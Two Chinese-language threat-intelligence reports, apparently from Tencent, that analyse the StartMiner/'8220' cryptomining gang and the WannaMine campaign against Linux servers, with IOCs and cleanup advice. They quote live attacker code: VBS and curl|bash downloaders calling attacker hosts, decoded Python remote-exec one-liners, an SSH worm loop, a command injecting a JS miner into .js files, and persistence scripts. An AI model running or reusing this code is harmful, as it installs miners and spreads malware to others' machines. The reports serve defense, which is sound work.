漏洞攻击时利用Shell执行的另一段VBS代码apps.vbs下载的挖矿木马为ww.exe,存放至C:/Windows/temp/12.exe或C:/Windows/temp/13.exe,并直接传入挖矿参数开启挖矿。 c:\windows\temp\apps.vbs内容如下: Set Post = CreateObject(“Msxml2.XMLHTTP”) Set Shell = CreateObject(“Wscript.Shell”) Post.Open “GET”,”http://jukesbrxd.xyz/ww.exe”,0 Post.Send() Set aGet = CreateObject(“ADODB.Stream”) aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(Post.responseBody) aGet.SaveToFile “C:/Windows/temp/12.exe”,2 wscript.sleep 10000 Shell.Run (“C:/Windows/temp/13.exe –donate-level=1 -k -o 37.59.162.30:5790 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B”) 四、爆破攻击Tomcat服务器挖矿 该团伙利用漏洞攻击成功后,会向目标服务器植入多款挖矿木马进行门罗币挖矿。 Tomcat 是由 Apache 开发的一个 Servlet 容器,实现了对 Servlet 和 JSP 的支持,并提供了作为Web服务器的一些特有功能,如Tomcat管理和控制平台、安全域管理和Tomcat阀等, /manager/html为tomcat自带管理功能后台,如果密码强度不高,容易被黑客破解入侵。 黑客针对Tomcat服务器进行扫描和暴力破解,然后将保存在FTP服务器上的PHP木马和VM木马下载到失陷机器,利用php木马继续下载挖矿木马。 Win.php 通过system执行cmd命令,利用certutil.exe下载ww.exe,存放至c:\windows\temp\kkw2.exe,传入参数开启挖矿:–donate-level=1 -k –max-cpu-usage 100 -o 23.94.24.12:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B 创建脚本kkmw.txt、kksw.txt,利用ftp命令从服务器ftp[:]//107.189.11.170下载kmkww.exe、ww.exe,传入挖矿参数启动挖矿; 创建下载脚本poc.vbs,并写入以下代码,下载ww.exe并启动挖矿: Set objXMLHTTP=CreateObject(“MSXML2.XMLHTTP”) objXMLHTTP.open “GET”,”http://107.189.11.170/ww.exe”,false objXMLHTTP.send() If objXMLHTTP.Status=200 Then Set objADOStream=CreateObject(“ADODB.Stream”) objADOStream.Open objADOStream.Type=1 objADOStream.Write objXMLHTTP.ResponseBody objADOStream.Position=0 objADOStream.SaveToFile “C:\Windows\Temp\mess.exe” objADOStream.Close Set objADOStream=NothingEnd if Set objXMLHTTP=Nothing Set objShell=CreateObject(“WScript.Shell”) objShell.Exec(“C:\Windows\Temp\mess.exe –donate-level 1 -o 23.94.24.12:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B”) 通过Powershell命令下载和执行3.ps1、2.ps1。 创建poc2.vbs,写入与poc.vbs类似的下载代码,下载kmkww.exe启动挖矿。 Linx.php 修改DNS服务器为8.8.8.8 安装Linux下载工具: apt-get install wget -y; yum install wget -y; apt-get install curl -y; yum install curl -y; 利用多个下载工具下载bash脚本2start.jpg并执行,运行后rm -rf删除文件: get -q -O – http://107.189.11.170/2start.jpg | bash -sh; url -fsSL http://107.189.11.170/2start.jpg | bash -sh; wget -q -O – http://107.189.11.170/2start.jpg | bash -sh; curl -fsSL http://107.189.11.170/2start.jpg | bash -sh; cur -fsSL http://107.189.11.170/2start.jpg | bash -sh; lwp-download http://107.189.11.170/2start.jpg /tmp/2start.jpg; bash /tmp/2start.jpg; rm -rf 2start.jpg; 解码base64编码的python脚本并运行,最后history -c删除记录。 Base64: cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xMDcuMTg5LjExLjE3MC9hLnB5IikucmVhZCgpKSc= 解码: python -c ‘import urllib;exec(urllib.urlopen(“http://107.189.11.170/a.py”).read())’ Base64: cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xMDcuMTg5LjExLjE3MC9iLnB5IikucmVhZCgpKSc= 解码: python -c ‘import urllib;exec(urllib.urlopen(“http://107.189.11.170/b.py”).read())’ Powershell 木马攻击Windows系统使用的3.ps1具有以下功能: 下载ww32.exe、kkw2.exe并保存至temp目录。 找到进程可能是其他挖矿木马的端口连接,杀死对应进程 将Powershell脚本why.ps1、why4.ps1安装为计划任务 “Update service for Oracle productsm”,并删除旧的计划任务。 匹配文件名,退出杀软进程和竞品挖矿木马进程,包括ddg.exe,然后启动自己的挖矿进程kkw2.exe。 Python 攻击Linux系统使用的linx.php会执行Python脚本a.py,该脚本负责下载32位、64位Linux系统版本挖矿木马i686、x86_64,并通过命令chomd设置读、写、运行三种权限,然后运行挖矿。 i686、x86_64是由XMRig程序编译的Linux版本挖矿木马 五、组建Tsunami僵尸网络进行DDoS攻击 b.py则下载32位、64位基于Linux系统的Tsunami(海啸)僵尸网络木马x64b、x32b。 Tsunami会利用远程代码执行漏洞,扫描、定位和攻击脆弱的系统,攻击成功会会导致僵尸网络完全控制设备。Tsunami通过IRC协议与C2服务器通信,接收指令并发起HTTP、UDP类型的DDoS攻击。 六、横向移动 利用Redis未授权访问漏洞 木马用于扫描攻击的ss2.py、ss3.py经过base64编码,解码后的内容都是下载new.py执行。 new.py首先生成待攻击的IP列表IP_LIST,其中方法一位获取本机IP的A段和B段,然后依次遍历0~256,1~256组成C段和D段;方法二为随机生成10万个IP,排除内网IP地址;最后把两种方法生成的IP合并到同一个列表得到约16万个IP。 对每个IP进行6379端口(Redis服务)探测连接,如果端口开放,继续判断是否存在Redis未授权访问漏洞。 Redis在默认情况下,会绑定在0.0.0.0:6379。如果没有采取相关的安全策略会使Redis服务完全暴露在公网上。如果在没有设置密码认证(一般为空)的情况下,攻击者可以在未授权访问Redis的情况下,利用Redis自身的提供的config命令,进行文件的读写等操作,包括将自己的ssh公钥写入到目标服务器的 /root/.ssh文件夹下的authotrized_keys文件中,进而可以使用对应的私钥直接使用ssh服务登录目标服务器。 如果被扫描IP存在Redis未授权访问漏洞,通过命令将curl、wget下载执行恶意脚本hehe.sh的代码写入crontab定时任务(写入“/var/spool/cron”、“/var/spool/cron/crontabs”),每1分钟执行一次。 curl -fsSLk -max -time 40 http[:]//jukesxdbrxd.xyz/hehe.sh -o ~/.ntp || wget –quiet –no-check-certificate –timeout=40 http[:]//jukesxdbrxd.xyz/hehe.sh -o ~/.ntp SSH连接 hehe.sh继续通过基于公钥认证的SSH攻击其他机器,从/.ssh/known_hosts中获取已认证的远程主机ID,与对应的机器建立SSH连接并执行命令下载恶意脚本hehe.sh: if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then   for h in $(grep -oE “\b([0-9]{1,3}\.){3}[0-9]{1,3}\b” /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h ‘(curl -fsSL http://www.jukesxdbrxd.xyz/hehe.sh||wget -q -O- http://www.jukesxdbrxd.xyz/hehe.sh)|bash >/dev/null 2>&1 &’ & done fi for file in /home/* do     if test -d $file     then         if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then             for h in $(grep -oE “\b([0-9]{1,3}\.){3}[0-9]{1,3}\b” $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h ‘(curl -fsSL http://www.jukesxdbrxd.xyz/hehe.sh||wget -q -O- http://www.jukesxdbrxd.xyz/hehe.sh)|bash >/dev/null 2>&1 &’ & done         fi     fi done hehe.sh还会通过crontab定时任务设置持久化,定期下载自身运行。 执行base64编码的Python脚本,重新获取Python攻击代码new.py(由ss2.py、ss3.py下载)并发起新的攻击。 I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cDovL3d3dy5qdWtlc3hkYnJ4ZC54eXovc3MzLnB5Jwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz 解码: #coding: utf-8 import urllib import base64 d= ‘http://www.jukesxdbrxd.xyz/ss3.py’ try:     page=base64.b64decode(urllib.urlopen(d).read())     exec(page) except:     pass 挖矿木马植入 hehe.sh还会查找“.js”文件并在其中插入js挖矿木马http[:]//t.cn/EvlonFh(长链接对应https[:]//xmr.omine.org/assets/v7.js) 插入命令: find / -name ‘*.js’|xargs grep -L f4ce9|xargs sed -i ‘$a\document.write\(‘\’\<script\ src=\”http://t.cn/EvlonFh\”\>\</script\>\<script\>OMINEId\(\”61adfe72ae314d8f86532b3cd1c60bda\”,\”-1\”\)\</script\>\’\)\; js挖矿木马所属网站: 最后下载负责运行Linux平台ELF挖矿木马的shell脚本2start.jpg、3start.jpg: if [ $? -eq 0 ] then pwd else curl -s http://www.jukesxdbrxd.xyz/3start.jpg | bash -sh wget -q -O – http://www.jukesxdbrxd.xyz/3start.jpg | bash -sh url -s http://www.jukesxdbrxd.xyz/3start.jpg | bash -sh get -q -O – http://www.jukesxdbrxd.xyz/3start.jpg | bash -sh curl -s http://www.jukesxdbrxd.xyz/2start.jpg | bash -sh wget -q -O – http://www.jukesxdbrxd.xyz/2start.jpg | bash -sh url -s http://www.jukesxdbrxd.xyz/2start.jpg | bash -sh get -q -O – http://www.jukesxdbrxd.xyz/2start.jpg | bash -sh fi 2start.jpg或3start.jpg判断Linux挖矿木马kworkerdss是否存在 不存在则下载挖矿程序x、xx,以及挖矿配置文件wt.conf。 七、关联家族分析 1.代码相似性 我们取被友商划归为8220挖矿木马的Powershell脚本1.ps1与近期被友商命名为StartMiner的Powershell脚本3.ps1进行对比: 1.ps1  afd9911c85a034902cf8cca3854d4a23 (下载地址:http[:]//192.99.142.248:8220/1.ps1) 3.ps1  faf53676fa29216c14d3698ff44893c8(下载地址:http[:]//www.jukesxdbrxd.xyz/3.ps1) (注:根据木马下载核心shell脚本使用的地址http[:]//www.jukesxdbrxd.xyz/3start.jpg,www[.]jukesxdbrxd.xyz应属于StartMiner) 8220挖矿木马使用的1.ps1的主要有4个功能: 1、下载挖矿木马 2、安装计划任务执行Powershell脚本(持久化),清除旧的计划任务 3、杀死竞品挖矿木马 4、启动挖矿木马 StartMiner使用的3.ps1功能与上述1.ps1完全一致,只是在下载挖矿木马时同时下载了两个文件,因此在启动挖矿进程时也启动相应的两个,增加了通过联网端口匹配竞品挖矿进程,对清除竞品挖矿木马的文件名单进行了补充。 两者相同的清除计划任务名单: “Update service for Oracle products” “Update service for Oracle products5” “Update service for Oracle products1” “Update service for Oracle products2” “Update service for Oracle products3” “Update service for Oracle products4” “Update service for Oracle products7” “Update service for Oracle products8” “Update service for Oracle products0” “Update service for Oracle products9” “Update service for Oracle productsa” “Update service for Oracle productsc” “Update service for Oracle productsm” 两者相同的清除竞品挖矿木马进程名单: ddg.exe yam.exe miner.exe xmrig.exe nscpucnminer32.exe 1e.exe iie.exe 3.exe iee.exe ie.exe je.exe im360sd.exe iexplorer.exe imzhudongfangyu.exe 360tray.exe 360rp.exe 360rps.exe pe.exe me.exe 2.共同的C2 37.44.212.223,作为8220挖矿木马C2:http[:]//37.44.212.223/rig,作为StartMiner C2:http[:]//37.44.212.223/x 3.门罗币钱包 “8220”挖矿木马与StartMiner挖矿木马都使用了门罗币钱包: 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ StartMiner: 由steamhuby.exe(8780219e4a6eb4bd1b618aee4167be5a)释放出挖矿配置文件cfg “8220”挖矿木马:由antspywares.exe(4b5df24b5deda127966029ce0fd83897)释放出配置文件cfg 并且steamhuby.exe和antspywares.exe解密挖矿配置文件时创建相同的互斥量“4e064bee1f3860fd606a”,使用相同的密钥:”0125789244697858″。 4. FTP服务器 都使用FTP服务器提供木马下载服务。 8220挖矿木马:ftp[:]//93.174.93.149 StartMiner:ftp[:]//107.189.11.170 基于上述特点我们认为2020年初开始出现的StartMiner与2017年被曝光的“8220”挖矿木马属于同一团伙,而该团伙在近期攻击过程中已不再具有明显的“8220”端口使用的特征。近期攻击过程中偏好使用的文件名如下: PE文件: isassx.exe、steamhuby.exe、kmkww.exe、haha.exe、hue.exe、xmrig1.exe、ww.exe、ww32.exe、x.jpeg、issaasss、xmrig.exe、ww2.exe、isasss.exe、ready.exe、oity.exe、kkw2.exe、12.exe、13.exe、mess.exe ELF文件: x86_64、i686、x64b、x32b、hxx、xx、x、1.so、Kworkerdss Linux Shell脚本: 2start.jpg、3start.jpg、response.jpeg、it.sh、go、go4、go3、hehe.sh、xdd.sh、start.sh Powershell脚本: 2.ps1、3.ps1、why.ps1、why2.ps1、why3.ps1、kkmswx.ps1 Python脚本: a.py、b.py、ss2.py、ss3.py、new.py VBS脚本: app.vbs、apps.vbs、poc.vbs PHP文件: linx.php、win.php VM文件(类似于JSP): linx.vm、win,vm、win2.vm txt文件: kmkww.txt、xmr.txt、config.txt、kkmw.txt、kksw.txt IOCS Domain jukesbrxd.xyz www.jukesxdbrxd.xyz IP 107.189.11.170 104.244.75.25 23.94.24.12 104.244.74.248 37.44.212.223 URL http[:]//jukesbrxd.xyz/isassx.exe http[:]//jukesbrxd.xyz/ww.exe http[:]//www.jukesxdbrxd.xyz/steamhuby.exe http[:]//www.jukesxdbrxd.xyz/new.py http[:]//www.jukesxdbrxd.xyz/xmr.txt http[:]//jukesxdbrxd.xyz/hehe.sh http[:]//104.244.75.25/steamhuby.exe http[:]//104.244.75.25/kmkww.exe http[:]//104.244.75.25/i686 http[:]//37.44.212.223/haha.exe http[:]//37.44.212.223/hue.exe http[:]//37.44.212.223/xmrig1.exe http[:]//37.44.212.223/xdxd.txt http[:]//107.189.11.170/a.py http[:]//107.189.11.170/b.py http[:]//107.189.11.170/3.ps1 ftp[:]//107.189.11.170/kmkww.exe ftp[:]//107.189.11.170/linx.php ftp[:]//107.189.11.170/linx.vm ftp[:]//107.189.11.170/win.php ftp[:]//107.189.11.170/win.vm ftp[:]//107.189.11.170/win2.vm ftp[:]//107.189.11.170/ww.exe http[:]//107.189.11.170/x64b http[:]//107.189.11.170/x32b http[:]//185.153.180.59/isassx.exe http[:]//104.244.74.248/x86_64 http[:]//23.94.24.12/kmkww.txt MD5 MD5 病毒名 8780219e4a6eb4bd1b618aee4167be5a Win32.Trojan.Inject.Auto 3c27fc39cccfdca4c38735ba6676364c Win32.Trojan.Inject.Auto ce854dd32e1d931cd6a791b30dcd9458 Win32.Trojan.Inject.Auto 64cb1856e9698cf0457a90c07a188169 Linux.Trojan.Shell.Loni c0ab986107d80f4ddbfdb46d3426244a Linux.Trojan.Shell.Djeg 46aeb7070c73c6f66171c0f86baf9433 Win32.Risk.Bitcoinminer.Pdwo a5c7c93fa57c1fc27cde28b047c85be6 Linux.Trojan.Bitcoinminer.Lnxv afd9911c85a034902cf8cca3854d4a23 Win32.Trojan.Generic.Lscf faf53676fa29216c14d3698ff44893c8 Win32.Trojan.Agent.Auto 3d99bd4a5916308685ab16ed64265b41 Linux.Trojan.Python.Dqdx 15e503acfa91f74b7a3de96cede5bde5 Linux.Trojan.Python.Hzqc 9fe932ac3055045a46d44997a4c6d481 Linux.Trojan.Miner.Rusg c4d44eed4916675dd408ff0b3562fb1f Linux.Backdoor.Tsunami.Ejrw ee48aa6068988649e41febfa0e3b2169 Linux.Backdoor.Tsunami.Amce d4ae941c505ee53e344fb4d4c2e102b7 Win32.Trojan.Miner.Buox c915dee2be8d698a02125caf8e0e938e Linux.Exploit.Redisattack.Kiqf 1e715be740f9f484c67d50f4f5b04d95 Linux.Exploit.Redisattack.Aqmo 25b8710947639ee3572c70f49eb3a207 Win32.Trojan-downloader.Miner.Hrzc e3e156053ef2ea06ae6c7dccba4ad7bc Linux.Backdoor.Phpshell.Gnnv c28cd1fd309d31d2db9a4776651bed4d Linux.Backdoor.Phpshell.Psdk d875b62187076116b9818249d57d565f Linux.Trojan.Miner.Uqid 矿池: 37.59.162.30:5790 23.94.24.12:8080 pool.hashvault.pro:80 钱包: 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ 参考链接: 新型IoT/Linux恶意软件针对DVR攻击组成僵尸网络 https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/ 疑似国内来源的“8220挖矿团伙”追踪溯源分析 https://mp.weixin.qq.com/s/oUV6iDvIrsoiQztjNVCDIA “8220团伙”最新活动分析:挖矿木马与勒索病毒共舞 https://mp.weixin.qq.com/s/CPHRAntQAflcJr_BcNnNUg 8220团伙新动向:利用Aapche Struts高危漏洞入侵,Windows、Linux双平台挖矿 https://mp.weixin.qq.com/s/sO8sXWKVWCHS6upVc_6UtQ 抗“疫”时期,谨防服务器被StartMiner趁机挖矿! https://mp.weixin.qq.com/s/4350pUlXYXTMyYEAzztwQQ

WannaMine 挖矿木马再活跃,14 万台 linux 系统受攻击,广东省为重灾区

感谢腾讯御见威胁情报中心来稿! 原文:WannaMine挖矿木马再活跃,14万台linux系统受攻击,广东省为重灾区   一、背景 腾讯安全专家在为某企业客户进行例行安全巡检过程中,发现客户部署的腾讯御界高级威胁检测系统出现了SSH服务失陷感知信息。 在征得客户同意后对客户机器进行远程取证,并结合御界的关键日志进行分析,我们发现这是一起针对SSH服务器弱口令爆破攻击事件,由于发现及时,工程师及时协助客户进行隔离及杀毒,并未造成损失。 腾讯安全御见威胁情报中心展开事件调查,结果发现,这是由大型挖矿僵尸网络WannaMine发起的攻击事件:攻击者利用SSH弱口令爆破成功后会植入shell后门以及brootkit后门程序,并通过SSH在内网横向传播,受害机器接收远程指令安装(包括但不限于)挖矿木马、DDoS攻击模块。 SSH代表安全外壳(Secure Shell),它现在是通过互联网访问网络设备和服务器的主要协议之一。SSH主要用在所有流行的操作系统上,比如Unix、Solaris、Red-Hat Linux、CentOS和Ubuntu等。SSH默认情况使用端口号22,我们通过zoomeye查找开放22端口的设备,发现全球有超过1亿台设备开放了该端口,这意味着超过1亿台设备有被爆破攻击的可能。(参考链接:https://www.zoomeye.org/searchResult?q=port%3A22) 根据腾讯安全御见威胁情报中心的监测数据,WannaMine自2019年6月开始在国内呈现新的快速增长趋势,目前已影响近14万台设备。 病毒感染地区分布前三名分别为:广东(20.3%)、江苏(7.7%)、浙江(7%)。 WannaMine病毒受害者分布 受WannaMine病毒影响的主要行业为工业企业(34.11%),其次为互联网企业(10.85%)和教育行业(10.08%)。 WannaMine挖矿木马影响的主要行业 二、详细分析 分析发现,此次攻击事件中WannaMine开始将攻击目标转向Linux系统,其行为主要具有以下特点: 1、会获取被感染机器的SSH连接记录,从而攻击该机器登录过的所有远程服务器,以达到横向传播的目的; 2、检测中招机器上的“安全狗”、“安骑士”、“云锁”、“悬镜卫士”等12种服务器防护软件,针对每一款软件进行退出及删除; 3、将守护脚本代码添加至Linux启动项、定时任务,以达到持久化;最后清除挖矿竞争对手,开启挖矿,并尝试利用Linux内核提权漏洞CVE-2016-5195获取系统Root权限; 4、植入Linux平台DDoS木马“BillGates”,该木马伪装成Linux系统工具“ps”,“lsof”和”netstat”等进行隐藏,具有远程shell、作为客户端或服务器运行的功能。“BillGates”接收远程指令,对目标进行多种类型的DDoS攻击。 WannaMine攻击Linux系统 Shell 在通过漏洞攻击、爆破攻击进入Linux系统后,病毒植入“Shell”脚本。脚本首先进行变量声明,指定后续需要用到的网络地址,文件路径等信息。 指定木马远程地址和目录、以及文件hash: temp_remote_host: 远程地址 sodd_info_arr: DDoS木马 tiktoor_info_arr: brootkit后门 pxe_info_arr: CVE-2016-5195内核提权 指定木马执行路径、进程名及相关参数: 下载文件保存目录:DownloadPath=”/usr/lib/…” Shell进程名:ShellProceName=”diskmanagerd” DDoS木马进程名:soddProceName=”kacpi_notify” Shell进程权限:shell_privilege=1 系统类型:OsType=1 校验方法:verify_method=”md5sum” Shell参数:ShellArg=$1 当前版本:Ver=1.0 对抗杀软 通过ls -l /etc/init.d/$servicename检测以下防护服务: Safedog:安全狗 aegis:安骑士 yunsuo:云锁 clamd:ClamAV avast:Avast avgd:AVG cmdavd:COMODO Antivirus cmdmgd:COMODO Antivirus drweb-configd:Dr.Web drweb-spider-kmod:Dr.Web esets:ESET NOD32 Antivirus xmirrord:悬镜服务器卫士 然后针对每一款防护软件进行清理,包括停止服务、杀死进程、删除文件、卸载软件等操作。 function BasicInit(){}执行基础的初始化。 使用ping命令检查remote_host中的第一个地址是否能连接,如果不能则使用第二个; 通过查看$UID、$EUID的值来确定当前的权限,高权限则设置下载目录为”/home/$USER/…”,低权限设置为”/usr/lib/…”; 检查当前是否具有md5校验功能;检查当前系统属于CentOS/Ubantu/Debian中的哪一种,默认为CentOS。 内核提权 function RunInBack(){}检查shell是否使用/sbin/init运行,如果不是则将脚本移动到以前具有写入权限(Rwx)的文件夹,其名称为“diskmanagerd”(名称在$ShellProceName名称变量中指定),然后将脚本尝试使用nohup实用程序重新运行,或在未安装nohup时仅在后台运行。 function GetRootAccess(){}利用漏洞CVE-2016-5195获取系统Root权限。 参考链接:https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails CVE-2016-5195(脏牛漏洞)是因为Linux内核的内存子系统在处理写入时复制(copy-on-write, COW)时产生了竞争条件(race condition),攻击者利用此漏洞对只读内存映射进行写访问,从而可获得Linux设备的root权限。 清除挖矿竞品 function WorkProc(){}检测并结束挖矿相关的进程。 持久化攻击 function SetStartup(){}中分别添加守护程序到Linux启动项目录、定时任务,以达到反复执行shell的目的。 守护脚本1: guarderText=”#!/bin/sh # chkconfig: 12345 90 90 # description: irqbalence ### BEGIN INIT INFO # Provides:     irqbalence # Required-Start: # Required-Stop: # Default-Start:    1 2 3 4 5 # Default-Stop: # Short-Description:    irqbalence ### END INIT INFO case \$1 in start)     /usr/bin/irqbalence     ;; stop)     ;; *)     /usr/bin/irqbalence     ;; esac” 将guarderText内容写入启动目录/etc/rc.d/init.d目录下,从而在启动时执行。 守护脚本2: guarderText2=”#!/bin/sh PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin for i in \`cat /proc/net/dev|grep :|awk -F: {‘print \$1’}\`; do ifconfig \$i up& done if [ ! -f \”$DownloadPath/$ShellProceName\” ]; then     \cp -rf /lib/libterminfo.so $DownloadPath/httpdinfo fi test=0 for i in /proc/* do     if [ -d \”\$i\” ] && [ \”\$i\” != \”/proc/\$\$\” ];then         if [ -f \”\$i/exe\” ]; then             temp=\`ls -l \$i | grep exe | grep /bin/bash\`             if [ \”\$temp\” != \”\” ]; then                 temp=\`cat \$i/cmdline\`                 result=\$(echo \”\$temp\” | grep \”$ShellProceName\”)                 if [ \”\$result\” != \”\” ]; then                     test=1                     break                 fi             fi         fi     fi done if [ \”\$test\” = 0 ]; then     (exec $DownloadPath/httpdinfo &> /dev/null &) fi” 将guarderText2写入etc/cron.hourly/gcc4lef.sh,并安装为crontab定时任务运行 brootkit后门 function rootkit(){}安装brootkit后门(github: https://github.com/cloudsec/brootkit),该后门具有具有盗取root用户密码、隐藏文件和目录、隐藏进程、隐藏网络连接、反连后门、多线程端口扫描、HTTP下载、多线程SSH爆破等功能。 横向移动 function Dandelion(){}从各种来源(用户历史记录)收集有关当前用户之前通过SSH连接的所有远程服务器信息,尝试连接到这些主机并感染它们,以便将自身传播到更多的系统。 DDoS木马 function CheckUpdate(){}检查木马最新版本,并从服务器下载更新 function Guard(){}中下载DDoS病毒”BillGates”。 依次使用4中下载方法尝试下载(“wget” “curl” “python” “tcp”)。 下载完成后后使用md5sum计算文件md5并进行校验,验证md5值是否为6a971a24a418ce99e9a0cd65ba14078d/4e117357b8a5bf51aaba6e939cace26b。 BillGates(作者疑似比尔盖兹的粉丝) shell下载的文件为功能复杂DDoS木马BillGates,其得名于其在变量函数的命名中,大量使用“Gates”和“Bill”。此外,木马还具有伪装成Linux系统工具’ps’,’lsof’和’netstat’等进行隐藏自身、远程shell、作为客户端或服务器运行等特点。 木马早期大规模扫描和利用漏洞感染Elasticsearch服务器(ElasticSearch是一个基于Lucene的搜索服务器,是最受欢迎的企业搜索引擎)从而组成强大的僵尸网络。 木马首先建立一个包含文件名和路径的全局变量“监视”文件。监视文件代表初步安装的BillGates处于运行状态下。接下来通过CSysTool::CheckGatesType来确定当前处于哪种运行状态下,判断返回的全局变量g_iGatesType标识0至3共四种状态: 0代表当前进程的映像符合监控文件名和路径 1代表当前进程的映像不符合监控文件名和路径,并且不属于其他任何类型 2代表当前进程的映像符合/usr/bin/ 3代表当前进程的映像符合下列系统工具之一 /bin/netstat /bin/lsof /bin/ps /bin/ss /usr/bin/netstat /usr/bin/lsof /usr/bin/ps /usr/bin/ss /usr/sbin/netstat /usr/sbin/lsof /usr/sbin/ps /usr/sbin/ss 匹配到每个标识后都以不同的目的运行,这样使得BillGates作为单个实体可以运作四种不同的模式,执行多个独特的功能,从而其成为一个复杂的的多功能木马。 模式0 BillGates作为感染监控器,通过调用MainMonitor开始。在这种模式下的任务是不断监视活动进程列表以确定是否生成了由模式1(称为Host模式)产生的进程正在运行。 模式1 BillGates的Host模式。当main函数中调用MainBeikong开始执行。Host模式的初始化阶段完成后,MainBeikong通过调用MainProcess结束,MainProcess是BillGates在Host或Backdoor模式下运行时的核心功能。MainProcess首先初始化五个全局对象: Host或backdoor模式下的BillGates支持7种不同的管理控制命令: 其中DDoS攻击类型如下: 模式2 Backdoor模式。main函数中调用MainBackdoor进入该模式。使用BillGates文件替换Linux系统二进制文件,然后MainBackdoor调用MainProcess,在这之后执行代码与Host模式的行为相同。 模式3 公共设施。该模式通过调用MainSystool 开始,BillGates作为Linux系统二进制文件的代理运行,并从系统工具的输出中删除自己的痕迹。 三、总结 WannaMine攻击代码呈现高度系统化、定制化的特点,从首次出现之后,其载荷托管IP地址会在没一次重要更新之后进行切换。而观察历史托管IP与IP解析到的域名可以发现,跨时期、跨版本的攻击代码又存在使用相同的托管域名(标红域名)的情况,因此推测该病毒团伙存在在向其他团伙提供攻击武器的可能。 从攻击对象与手法上来看,WannaMine不断拓宽其攻击覆盖面,从最初的利用“永恒之蓝”漏洞、Powershell攻击Windows系统,到后来利用各类Web漏洞(Weblogic、PHPMyAdmin、Drupal)攻击Windows上搭建的服务器,到最后通过MsSQL爆破攻击SQL服务器,以及SSH爆破攻击Linux服务器。 在木马类型上,开始以植入挖矿和远控类型木马为主,后来逐渐加入DDoS木马(包括Windows平台和Linux平台),其目标在于组建庞大的挖矿僵尸网络以及DDoS僵尸网络,使该病毒团伙具有不断更新、内网横向移动、持久化获利的能力。 四、安全建议 1、及时为系统和应用软件打补丁,关闭不必要的端口和服务; 2、使用高强度的系统登陆密码、SSH登陆密码、MsSQL数据库密码等; 3、安装安全软件并保持安全软件正常开启,本案例说明,Linux系统被病毒入侵的事件越来越常见; 4、Linux服务器手动清理方案 删除启动项 /etc/rc.d/init.d/diskmanagerd /etc/rcS.d/S90diskmanagerd 删除定时任务 */3 * * * * root /etc/cron.hourly/gcc4lef.sh 删除文件 /tmp/…/brootkit.sh /tmp/…/install.sh /tmp/…/just4root /tmp/…/pxe 关闭进程 /usr/lib/diskmanagerd /home/$USER/diskmanagerd /usr/lib/kacpi_notify /home/$USER/kacpi_notify 5、修复漏洞(Dirty COW:CVE-2016-5195) 各操作系统供应商下载Linux kernel 4.8.3、Linux kernel 4.7.9和Linux kernel 4.4.26 LTS,为用户提供稳定版渠道更新。 软件开发人员可以通过 https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 重新编译Linux修复此漏洞。 6、ssh非交互方式登录到远程服务器时,设置主机公钥确认StrictHostKeyChecking的值为ask或yes,避免历史SSH登录记录被病毒利用,形成内网扩散。 (注:StrictHostKeyChecking=no 最不安全的级别,连接server的key在本地不存在,就自动添加到文件中(默认是known_hosts)。 StrictHostKeyChecking=ask 默认的级别,如果连接和key不匹配,给出提示,并拒绝登录。 StrictHostKeyChecking=yes最安全的级别,如果连接与key不匹配,就拒绝连接,不会提示详细信息。) 7、使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。 IOCs IP 195.22.127.157 107.179.67.243 45.63.55.15 94.102.52.36 123.59.68.172 93.174.93.73 121.17.28.15 195.22.127.93 198.54.117.244 107.148.195.71 185.128.40.102 185.128.43.62 192.74.245.97 87.121.98.215 172.247.116.8 172.247.116.87 45.199.154.108 111.90.140.35 185.234.218.40 185.128.41.90 Domain node3.jhshxbv.com node.jhshxbv.com node4.jhshxbv.com node2.jhshxbv.com stafftest.spdns.eu profetestruec.net nuki-dx.com ddd.parkmap.org yp.parkmap.org demaxiya.info、 fashionbookmark.com www.windowsdefenderhost.club update.windowsdefenderhost.club d4uk.7h4uk.com update.7h4uk.com info.7h4uk.com oa.to0ls.com mail.to0ls.com auth.to0ls.com MD5 1db902385b4480a76e4527605eb9f825(Shell) 6a971a24a418ce99e9a0cd65ba14078d(BillGates) 4e117357b8a5bf51aaba6e939cace26b(BillGates) 